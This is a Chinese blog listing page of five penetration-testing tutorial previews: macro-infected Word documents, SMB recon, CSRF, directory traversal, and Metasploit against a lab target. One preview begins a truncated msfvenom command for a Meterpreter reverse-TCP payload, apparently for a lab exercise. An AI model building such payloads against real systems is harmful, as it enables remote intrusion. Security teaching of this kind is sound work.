学神来啦123
学神来啦123
全部文章
技术文章
安全(30)
日常(5)
归档
标签
去牛客网
登录
/
注册
学神来啦123的博客
全部文章
/ 技术文章
(共5篇)
网络安全kali之利用宏感染word文档获取shell
来自专栏
首先将office 2016.zip上传到win7虚拟机上,解压后,安装一下office。 ┌──(root💀xuegod53)-[~] └─# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST...
网络安全
kali
kali linux
渗透测试
web安全
word
2022-03-25
0
635
网络安全 Kali web安全 基于SMB协议收集信息
来自专栏
SMB概述:服务器消息块(Server Message Block,缩写为SMB),又称网络文件共享系统(Common Internet File System,缩写为CIFS),一种应用层网络传输协议,由微软开发,主要功能是使网络上的机器能够共享计算机文件、打印机、串行端口和通讯等资源。 经过Un...
网络安全
kali
linux
smb
运维
web安全
2022-03-23
0
610
网络安全 kali Web安全之CSRF攻击
来自专栏
CSRF是什么? CSRF(Cross Site Request Forgery),中文是跨站点请求伪造。CSRF攻击者在用户已经登录目标网站之后,诱使用户访问一个攻击页面,利用目标网站对用户的信任,以用户身份在攻击页面对目标网站发起伪造用户操作的请求,达到攻击目的。 举个例子 简单版: 假如博...
linux
kali
web安全
网络安全
CSRF
2022-03-16
0
594
网络安全 kali web安全【渗透测试】目录遍历漏洞
来自专栏
许多的Web应用程序一般会有对服务器的文件读取查看的功能,大多会用到提交的参数来指明文件名 形如:http://www.nuanyue.com/getfile=image.jgp 当服务器处理传送过来的image.jpg文件名后,Web应用程序即会自动添加完整路径,形如“d://site/image...
kali
linux
网络安全
kali linux
web安全
2022-03-14
0
666
网络安全kali web安全 Kali之msf简单的漏洞利用
来自专栏
信息收集 靶机的IP地址为:192.168.173.136 利用nmap工具扫描其开放端口、系统等 整理一下目标系统的相关信息 系统版本:Windows server 2003 开放的端口及服务: 21/tcp ftp 135/tcp msrpc 139/tcp netbios-ss...
网络安全
kali
web安全
渗透测试
2022-03-08
0
652
牛客博客,记录你的成长
京公网安备 11010502036488号